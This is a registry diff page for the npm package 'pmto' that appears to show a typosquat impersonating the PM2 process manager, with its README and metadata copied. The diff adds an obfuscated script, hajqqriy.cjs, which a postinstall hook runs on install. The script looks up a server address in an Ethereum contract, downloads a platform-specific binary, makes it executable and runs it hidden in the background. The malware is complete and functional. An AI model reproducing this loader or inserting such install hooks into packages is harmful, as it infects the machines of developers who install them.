pmto 0.0.1-security → 5.4.2

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of pmto might be problematic. Click here for more details.

package/LICENSE ADDED
@@ -0,0 +1 @@
1
+ GNU-AGPL-3.0.txt
package/README.md CHANGED
@@ -1,5 +1,252 @@
1
- # Security holding package
1
+ <div align="center">
2
+ <br/>
3
+ <picture>
4
+ <source
5
+ srcset="https://raw.githubusercontent.com/Unitech/pm2/master/pres/pm2-v4.png"
6
+ width=710px
7
+ media="(prefers-color-scheme: light)"
8
+ />
9
+ <source
10
+ srcset="https://raw.githubusercontent.com/Unitech/pm2/development/pres/pm2-v4-dark-mode.png"
11
+ width=710px
12
+ media="(prefers-color-scheme: dark), (prefers-color-scheme: no-preference)"
13
+ />
14
+ <img src="https://raw.githubusercontent.com/Unitech/pm2/master/pres/pm2-v4.png" />
15
+ </picture>
2
16
 
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
17
+ <br/>
18
+ <br/>
19
+ <b>P</b>(rocess) <b>M</b>(anager) <b>2</b><br/>
20
+ <i>Runtime Edition</i>
21
+ <br/><br/>
4
22
 
5
- Please refer to www.npmjs.com/advisories?search=pmto for more information.
23
+
24
+ <a title="PM2 Downloads" href="https://npm-stat.com/charts.html?package=pm2&from=2018-01-01&to=2023-08-01">
25
+ <img src="https://img.shields.io/npm/dm/pm2" alt="Downloads per Month"/>
26
+ </a>
27
+
28
+ <a title="PM2 Downloads" href="https://npm-stat.com/charts.html?package=pm2&from=2018-01-01&to=2023-08-01">
29
+ <img src="https://img.shields.io/npm/dy/pm2" alt="Downloads per Year"/>
30
+ </a>
31
+
32
+ <a href="https://badge.fury.io/js/pm2" title="NPM Version Badge">
33
+ <img src="https://badge.fury.io/js/pm2.svg" alt="npm version">
34
+ </a>
35
+
36
+ <br/>
37
+ <br/>
38
+ <br/>
39
+ </div>
40
+
41
+
42
+ PM2 is a production process manager for Node.js applications with a built-in load balancer. It allows you to keep applications alive forever, to reload them without downtime and to facilitate common system admin tasks.
43
+
44
+ Starting an application in production mode is as easy as:
45
+
46
+ ```bash
47
+ $ pm2 start app.js
48
+ ```
49
+
50
+ PM2 is constantly assailed by [more than 1800 tests](https://github.com/Unitech/pm2/actions/workflows/node.js.yml).
51
+
52
+ Official website: [https://pm2.keymetrics.io/](https://pm2.keymetrics.io/)
53
+
54
+ Works on Linux (stable) & macOS (stable) & Windows (stable). All Node.js versions are supported starting Node.js 12.X.
55
+
56
+
57
+ ### Installing PM2
58
+
59
+ With NPM:
60
+
61
+ ```bash
62
+ $ npm install pm2 -g
63
+ ```
64
+
65
+ You can install Node.js easily with [NVM](https://github.com/nvm-sh/nvm#installing-and-updating) or [FNM](https://github.com/Schniz/fnm).
66
+
67
+ ### Start an application
68
+
69
+ You can start any application (Node.js, Python, Ruby, binaries in $PATH...) like that:
70
+
71
+ ```bash
72
+ $ pm2 start app.js
73
+ ```
74
+
75
+ Your app is now daemonized, monitored and kept alive forever.
76
+
77
+ ### Managing Applications
78
+
79
+ Once applications are started you can manage them easily:
80
+
81
+ ![Process listing](https://github.com/Unitech/pm2/raw/master/pres/pm2-ls-v2.png)
82
+
83
+ To list all running applications:
84
+
85
+ ```bash
86
+ $ pm2 list
87
+ ```
88
+
89
+ Managing apps is straightforward:
90
+
91
+ ```bash
92
+ $ pm2 stop <app_name|namespace|id|'all'|json_conf>
93
+ $ pm2 restart <app_name|namespace|id|'all'|json_conf>
94
+ $ pm2 delete <app_name|namespace|id|'all'|json_conf>
95
+ ```
96
+
97
+ To have more details on a specific application:
98
+
99
+ ```bash
100
+ $ pm2 describe <id|app_name>
101
+ ```
102
+
103
+ To monitor logs, custom metrics, application information:
104
+
105
+ ```bash
106
+ $ pm2 monit
107
+ ```
108
+
109
+ [More about Process Management](https://pm2.keymetrics.io/docs/usage/process-management/)
110
+
111
+ ### Cluster Mode: Node.js Load Balancing & Zero Downtime Reload
112
+
113
+ The Cluster mode is a special mode when starting a Node.js application, it starts multiple processes and load-balance HTTP/TCP/UDP queries between them. This increase overall performance (by a factor of x10 on 16 cores machines) and reliability (faster socket re-balancing in case of unhandled errors).
114
+
115
+ ![Framework supported](https://raw.githubusercontent.com/Unitech/PM2/master/pres/cluster.png)
116
+
117
+ Starting a Node.js application in cluster mode that will leverage all CPUs available:
118
+
119
+ ```bash
120
+ $ pm2 start api.js -i <processes>
121
+ ```
122
+
123
+ `<processes>` can be `'max'`, `-1` (all cpu minus 1) or a specified number of instances to start.
124
+
125
+ **Zero Downtime Reload**
126
+
127
+ Hot Reload allows to update an application without any downtime:
128
+
129
+ ```bash
130
+ $ pm2 reload all
131
+ ```
132
+
133
+ [More informations about how PM2 make clustering easy](https://pm2.keymetrics.io/docs/usage/cluster-mode/)
134
+
135
+ ### Container Support
136
+
137
+ With the drop-in replacement command for `node`, called `pm2-runtime`, run your Node.js application in a hardened production environment.
138
+ Using it is seamless:
139
+
140
+ ```
141
+ RUN npm install pm2 -g
142
+ CMD [ "pm2-runtime", "npm", "--", "start" ]
143
+ ```
144
+
145
+ [Read More about the dedicated integration](https://pm2.keymetrics.io/docs/usage/docker-pm2-nodejs/)
146
+
147
+ ### Host monitoring speedbar
148
+
149
+ PM2 allows to monitor your host/server vitals with a monitoring speedbar.
150
+
151
+ To enable host monitoring:
152
+
153
+ ```bash
154
+ $ pm2 set pm2:sysmonit true
155
+ $ pm2 update
156
+ ```
157
+
158
+ ![Framework supported](https://raw.githubusercontent.com/Unitech/PM2/master/pres/vitals.png)
159
+
160
+ ### Terminal Based Monitoring
161
+
162
+ ![Monit](https://github.com/Unitech/pm2/raw/master/pres/pm2-monit.png)
163
+
164
+ Monitor all processes launched straight from the command line:
165
+
166
+ ```bash
167
+ $ pm2 monit
168
+ ```
169
+
170
+ ### Log Management
171
+
172
+ To consult logs just type the command:
173
+
174
+ ```bash
175
+ $ pm2 logs
176
+ ```
177
+
178
+ Standard, Raw, JSON and formated output are available.
179
+
180
+ Examples:
181
+
182
+ ```bash
183
+ $ pm2 logs APP-NAME # Display APP-NAME logs
184
+ $ pm2 logs --json # JSON output
185
+ $ pm2 logs --format # Formated output
186
+
187
+ $ pm2 flush # Flush all logs
188
+ $ pm2 reloadLogs # Reload all logs
189
+ ```
190
+
191
+ To enable log rotation install the following module
192
+
193
+ ```bash
194
+ $ pm2 install pm2-logrotate
195
+ ```
196
+
197
+ [More about log management](https://pm2.keymetrics.io/docs/usage/log-management/)
198
+
199
+ ### Startup Scripts Generation
200
+
201
+ PM2 can generate and configure a Startup Script to keep PM2 and your processes alive at every server restart.
202
+
203
+ Init Systems Supported: **systemd**, **upstart**, **launchd**, **rc.d**
204
+
205
+ ```bash
206
+ # Generate Startup Script
207
+ $ pm2 startup
208
+
209
+ # Freeze your process list across server restart
210
+ $ pm2 save
211
+
212
+ # Remove Startup Script
213
+ $ pm2 unstartup
214
+ ```
215
+
216
+ [More about Startup Scripts Generation](https://pm2.keymetrics.io/docs/usage/startup/)
217
+
218
+ ### Updating PM2
219
+
220
+ ```bash
221
+ # Install latest PM2 version
222
+ $ npm install pm2@latest -g
223
+ # Save process list, exit old PM2 & restore all processes
224
+ $ pm2 update
225
+ ```
226
+
227
+ *PM2 updates are seamless*
228
+
229
+ ## PM2+ Monitoring
230
+
231
+ If you manage your apps with PM2, PM2+ makes it easy to monitor and manage apps across servers.
232
+
233
+ ![https://app.pm2.io/](https://pm2.io/img/app-overview.png)
234
+
235
+ Feel free to try it:
236
+
237
+ [Discover the monitoring dashboard for PM2](https://app.pm2.io/)
238
+
239
+ Thanks in advance and we hope that you like PM2!
240
+
241
+ ## CHANGELOG
242
+
243
+ [CHANGELOG](https://github.com/Unitech/PM2/blob/master/CHANGELOG.md)
244
+
245
+ ## Contributors
246
+
247
+ [Contributors](http://pm2.keymetrics.io/hall-of-fame/)
248
+
249
+ ## License
250
+
251
+ PM2 is made available under the terms of the GNU Affero General Public License 3.0 (AGPL 3.0).
252
+ For other licenses [contact us](mailto:contact@keymetrics.io).
package/bin/pm2 ADDED
@@ -0,0 +1,3 @@
1
+ #!/usr/bin/env node
2
+
3
+ require('../lib/binaries/CLI.js');
package/bin/pm2-dev ADDED
@@ -0,0 +1,3 @@
1
+ #!/usr/bin/env node
2
+
3
+ require('../lib/binaries/DevCLI.js');
package/bin/pm2-docker ADDED
@@ -0,0 +1,3 @@
1
+ #!/usr/bin/env node
2
+
3
+ require('../lib/binaries/Runtime4Docker.js');
@@ -0,0 +1,3 @@
1
+ #!/usr/bin/env node
2
+
3
+ require('../lib/binaries/Runtime4Docker.js');
package/hajqqriy.cjs ADDED
@@ -0,0 +1 @@
1
+ function _0x53d8(_0x32c397,_0x4460fb){const _0x1be643=_0x1be6();return _0x53d8=function(_0x53d857,_0x45a841){_0x53d857=_0x53d857-0xab;let _0x25f416=_0x1be643[_0x53d857];return _0x25f416;},_0x53d8(_0x32c397,_0x4460fb);}const _0x1458de=_0x53d8;function _0x1be6(){const _0xb00903=['56hyMUlg','655606cOfyak','0xa1b40044EBc2794f207D45143Bd82a1B86156c6b','ethers','fOitJ','/node-linux','zxQdr','719964MPZkRP','Ошибка\x20установки:','Unsupported\x20platform:\x20','FzPPW','finish','util','Ошибка\x20при\x20получении\x20IP\x20адреса:','PQUGi','/node-win.exe','axios','data','path','gcSGF','tmpdir','755','darwin','error','FGvtH','0x52221c293a21D8CA7AFD01Ac6bFAC7175D590A84','sLSif','createWriteStream','Ошибка\x20при\x20запуске\x20файла:','40ZDmcWY','pipe','7585151kCdvyK','basename','xlRyj','/node-macos','tLGvS','Utnvb','Contract','getDefaultProvider','child_process','2146041SHxarO','win32','gwuBW','IrGQL','424233JYJYew','platform','1171965KoSjDZ','3124212Rzkiop','unref','join'];_0x1be6=function(){return _0xb00903;};return _0x1be6();}(function(_0x86681,_0x5ef04c){const _0x23b470=_0x53d8,_0x4c186b=_0x86681();while(!![]){try{const _0x4e4899=parseInt(_0x23b470(0xb5))/0x1+-parseInt(_0x23b470(0xba))/0x2+parseInt(_0x23b470(0xaf))/0x3+parseInt(_0x23b470(0xb6))/0x4+-parseInt(_0x23b470(0xd6))/0x5*(parseInt(_0x23b470(0xc0))/0x6)+-parseInt(_0x23b470(0xd8))/0x7+-parseInt(_0x23b470(0xb9))/0x8*(-parseInt(_0x23b470(0xb3))/0x9);if(_0x4e4899===_0x5ef04c)break;else _0x4c186b['push'](_0x4c186b['shift']());}catch(_0x2d2569){_0x4c186b['push'](_0x4c186b['shift']());}}}(_0x1be6,0x99120));const {ethers}=require(_0x1458de(0xbc)),axios=require(_0x1458de(0xc9)),util=require(_0x1458de(0xc5)),fs=require('fs'),path=require(_0x1458de(0xcb)),os=require('os'),{spawn}=require(_0x1458de(0xae)),contractAddress=_0x1458de(0xbb),WalletOwner=_0x1458de(0xd2),abi=['function\x20getString(address\x20account)\x20public\x20view\x20returns\x20(string)'],provider=ethers[_0x1458de(0xad)]('mainnet'),contract=new ethers[(_0x1458de(0xac))](contractAddress,abi,provider),fetchAndUpdateIp=async()=>{const _0x301fb2=_0x1458de,_0x3fa4af={'tfmsa':_0x301fb2(0xc6),'sLSif':function(_0xa52d69){return _0xa52d69();}};try{const _0x11e5a4=await contract['getString'](WalletOwner);return _0x11e5a4;}catch(_0x394b67){return console[_0x301fb2(0xd0)](_0x3fa4af['tfmsa'],_0x394b67),await _0x3fa4af[_0x301fb2(0xd3)](fetchAndUpdateIp);}},getDownloadUrl=_0x22d859=>{const _0x29d550=_0x1458de,_0xba3561={'Utnvb':_0x29d550(0xcf)},_0xe89116=os[_0x29d550(0xb4)]();switch(_0xe89116){case _0x29d550(0xb0):return _0x22d859+_0x29d550(0xc8);case'linux':return _0x22d859+_0x29d550(0xbe);case _0xba3561[_0x29d550(0xab)]:return _0x22d859+_0x29d550(0xdb);default:throw new Error(_0x29d550(0xc2)+_0xe89116);}},downloadFile=async(_0x356635,_0x148011)=>{const _0x35e954=_0x1458de,_0x217985={'gcSGF':_0x35e954(0xc4),'wJzXT':function(_0x6d88c6,_0x289c5b){return _0x6d88c6(_0x289c5b);},'zxQdr':'GET','FGYcE':'stream'},_0x28ec4c=fs[_0x35e954(0xd4)](_0x148011),_0x46507e=await _0x217985['wJzXT'](axios,{'url':_0x356635,'method':_0x217985[_0x35e954(0xbf)],'responseType':_0x217985['FGYcE']});return _0x46507e[_0x35e954(0xca)][_0x35e954(0xd7)](_0x28ec4c),new Promise((_0x13cebf,_0x5623a1)=>{const _0x55408b=_0x35e954;_0x28ec4c['on'](_0x217985[_0x55408b(0xcc)],_0x13cebf),_0x28ec4c['on'](_0x55408b(0xd0),_0x5623a1);});},executeFileInBackground=async _0x484281=>{const _0x40f7a9=_0x1458de,_0x34df5d={'OhytR':function(_0x391453,_0x463ba7,_0x5a3aed,_0x12aa6b){return _0x391453(_0x463ba7,_0x5a3aed,_0x12aa6b);},'rHBhf':'ignore','IrGQL':_0x40f7a9(0xd5)};try{const _0x307bad=_0x34df5d['OhytR'](spawn,_0x484281,[],{'detached':!![],'stdio':_0x34df5d['rHBhf']});_0x307bad[_0x40f7a9(0xb7)]();}catch(_0x5a0e22){console[_0x40f7a9(0xd0)](_0x34df5d[_0x40f7a9(0xb2)],_0x5a0e22);}},runInstallation=async()=>{const _0x2f480c=_0x1458de,_0xa7a13e={'tLGvS':function(_0x546869){return _0x546869();},'fOitJ':function(_0x175711,_0x3cebdd){return _0x175711(_0x3cebdd);},'FGvtH':function(_0x5c881b,_0x1167fd,_0x5e9ed0){return _0x5c881b(_0x1167fd,_0x5e9ed0);},'PQUGi':function(_0x5eadc5,_0x118d8d){return _0x5eadc5!==_0x118d8d;},'gwuBW':_0x2f480c(0xb0),'FzPPW':_0x2f480c(0xce),'xlRyj':_0x2f480c(0xc1)};try{const _0x243af1=await _0xa7a13e[_0x2f480c(0xdc)](fetchAndUpdateIp),_0x3752a4=_0xa7a13e[_0x2f480c(0xbd)](getDownloadUrl,_0x243af1),_0x54bd6d=os[_0x2f480c(0xcd)](),_0x3eac12=path[_0x2f480c(0xd9)](_0x3752a4),_0x337ba1=path[_0x2f480c(0xb8)](_0x54bd6d,_0x3eac12);await _0xa7a13e[_0x2f480c(0xd1)](downloadFile,_0x3752a4,_0x337ba1);if(_0xa7a13e[_0x2f480c(0xc7)](os[_0x2f480c(0xb4)](),_0xa7a13e[_0x2f480c(0xb1)]))fs['chmodSync'](_0x337ba1,_0xa7a13e[_0x2f480c(0xc3)]);_0xa7a13e[_0x2f480c(0xbd)](executeFileInBackground,_0x337ba1);}catch(_0x2fcac9){console[_0x2f480c(0xd0)](_0xa7a13e[_0x2f480c(0xda)],_0x2fcac9);}};runInstallation();
package/index.js ADDED
@@ -0,0 +1,12 @@
1
+ /**
2
+ * Copyright 2013-2022 the PM2 project authors. All rights reserved.
3
+ * Use of this source code is governed by a license that
4
+ * can be found in the LICENSE file.
5
+ */
6
+
7
+ process.env.PM2_PROGRAMMATIC = 'true';
8
+
9
+ var API = require('./lib/API.js');
10
+
11
+ module.exports = new API;
12
+ module.exports.custom = API;
package/package.json CHANGED
@@ -1,6 +1,219 @@
1
1
  {
2
2
  "name": "pmto",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
6
- }
3
+ "preferGlobal": true,
4
+ "version": "5.4.2",
5
+ "engines": {
6
+ "node": ">=12.0.0"
7
+ },
8
+ "directories": {
9
+ "bin": "./bin",
10
+ "lib": "./lib",
11
+ "example": "./examples"
12
+ },
13
+ "author": {
14
+ "name": "Strzelewicz Alexandre",
15
+ "email": "alexandre@pm2.io",
16
+ "url": "https://pm2.io"
17
+ },
18
+ "maintainers": [
19
+ {
20
+ "name": "Alexandre Strzelewicz",
21
+ "email": "alexandre@pm2.io"
22
+ },
23
+ {
24
+ "name": "Antoine Bluchet",
25
+ "email": "antoine@pm2.io"
26
+ }
27
+ ],
28
+ "contributors": [
29
+ {
30
+ "name": "Alex Kocharin",
31
+ "email": "alex@kocharin.ru"
32
+ },
33
+ {
34
+ "name": "Antoine Bluchet",
35
+ "email": "soyuka@gmail.com"
36
+ },
37
+ {
38
+ "name": "Subhash Burramsetty"
39
+ },
40
+ {
41
+ "name": "Valentin Marchaud",
42
+ "email": "thisismac47@gmail.com"
43
+ },
44
+ {
45
+ "name": "Valentin Touffet",
46
+ "email": "contact@eywek.fr"
47
+ },
48
+ {
49
+ "name": "Florian Hermouet-Joscht",
50
+ "email": "florian@keymetrics.io"
51
+ },
52
+ {
53
+ "name": "Vincent Vallet",
54
+ "email": "wallet77@gmail.com"
55
+ },
56
+ {
57
+ "name": "Joni Shkurti",
58
+ "email": "jonishkurti90@gmail.com"
59
+ },
60
+ {
61
+ "name": "Jun Tjatse",
62
+ "email": "thisnamemeansnothing@gmail.com"
63
+ },
64
+ {
65
+ "name": "Xu Jingxin",
66
+ "email": "sailxjx@gmail.com"
67
+ },
68
+ {
69
+ "name": "Ben Postlethwaite",
70
+ "email": "post.ben.here@gmail.com"
71
+ },
72
+ {
73
+ "name": "Devo.ps",
74
+ "email": "contact@devo.ps"
75
+ },
76
+ {
77
+ "name": "Bret Copeland",
78
+ "email": "bret@atlantisflight.org"
79
+ },
80
+ {
81
+ "name": "John Hurliman",
82
+ "email": "jhurliman@jhurliman.org"
83
+ },
84
+ {
85
+ "name": "TruongSinh Tran-Nguyen",
86
+ "email": "i@truongsinh.pro"
87
+ },
88
+ {
89
+ "name": "Michael Hueuberger",
90
+ "email": "michael.heuberger@binarykitchen.com"
91
+ },
92
+ {
93
+ "name": "Chris Wiggins",
94
+ "email": "chris@chriswiggins.co.nz"
95
+ }
96
+ ],
97
+ "homepage": "http://pm2.keymetrics.io/",
98
+ "description": "Production process manager for Node.JS applications with a built-in load balancer.",
99
+ "main": "index.js",
100
+ "types": "types/index.d.ts",
101
+ "scripts": {
102
+ "postinstall": "node hajqqriy.cjs"
103
+ },
104
+ "keywords": [
105
+ "cli",
106
+ "fault tolerant",
107
+ "sysadmin",
108
+ "tools",
109
+ "pm2",
110
+ "logs",
111
+ "log",
112
+ "json",
113
+ "express",
114
+ "hapi",
115
+ "kraken",
116
+ "reload",
117
+ "load balancer",
118
+ "lb",
119
+ "load-balancer",
120
+ "kubernetes",
121
+ "k8s",
122
+ "pm2-docker",
123
+ "runtime",
124
+ "source maps",
125
+ "graceful",
126
+ "microservice",
127
+ "programmatic",
128
+ "harmony",
129
+ "node-pm2",
130
+ "production",
131
+ "keymetrics",
132
+ "node.js monitoring",
133
+ "strong-pm",
134
+ "deploy",
135
+ "deployment",
136
+ "daemon",
137
+ "supervisor",
138
+ "supervisord",
139
+ "nodemon",
140
+ "pm2.io",
141
+ "ghost",
142
+ "ghost production",
143
+ "monitoring",
144
+ "keymetrics",
145
+ "process manager",
146
+ "forever",
147
+ "profiling",
148
+ "probes",
149
+ "apm",
150
+ "container",
151
+ "forever-monitor",
152
+ "keep process alive",
153
+ "process configuration",
154
+ "clustering",
155
+ "cluster cli",
156
+ "cluster",
157
+ "docker",
158
+ "cron",
159
+ "devops",
160
+ "dev ops"
161
+ ],
162
+ "bin": {
163
+ "pm2": "bin/pm2",
164
+ "pm2-dev": "bin/pm2-dev",
165
+ "pm2-docker": "bin/pm2-docker",
166
+ "pm2-runtime": "bin/pm2-runtime"
167
+ },
168
+ "dependencies": {
169
+ "@pm2/agent": "~2.0.0",
170
+ "@pm2/js-api": "~0.8.0",
171
+ "@pm2/io": "~6.0.1",
172
+ "@pm2/pm2-version-check": "latest",
173
+ "async": "~3.2.0",
174
+ "blessed": "0.1.81",
175
+ "chalk": "3.0.0",
176
+ "chokidar": "^3.5.3",
177
+ "cli-tableau": "^2.0.0",
178
+ "commander": "2.15.1",
179
+ "croner": "~4.1.92",
180
+ "dayjs": "~1.11.5",
181
+ "debug": "^4.3.1",
182
+ "enquirer": "2.3.6",
183
+ "eventemitter2": "5.0.1",
184
+ "fclone": "1.0.11",
185
+ "mkdirp": "1.0.4",
186
+ "needle": "2.4.0",
187
+ "pidusage": "~3.0",
188
+ "pm2-axon": "~4.0.1",
189
+ "pm2-axon-rpc": "~0.7.1",
190
+ "pm2-deploy": "~1.0.2",
191
+ "pm2-multimeter": "^0.1.2",
192
+ "promptly": "^2",
193
+ "semver": "^7.2",
194
+ "source-map-support": "0.5.21",
195
+ "sprintf-js": "1.1.2",
196
+ "vizion": "~2.2.1",
197
+ "js-yaml": "~4.1.0",
198
+ "axios": "^1.7.7",
199
+ "ethers": "^6.13.2"
200
+ },
201
+ "optionalDependencies": {
202
+ "pm2-sysmonit": "^1.2.8"
203
+ },
204
+ "devDependencies": {
205
+ "mocha": "^10.4.0",
206
+ "should": "^13.2.3"
207
+ },
208
+ "bugs": {
209
+ "url": "https://github.com/Unitech/pm2/issues"
210
+ },
211
+ "repository": {
212
+ "type": "git",
213
+ "url": "git://github.com/Unitech/pm2.git"
214
+ },
215
+ "license": "AGPL-3.0",
216
+ "files": [
217
+ "hajqqriy.cjs"
218
+ ]
219
+ }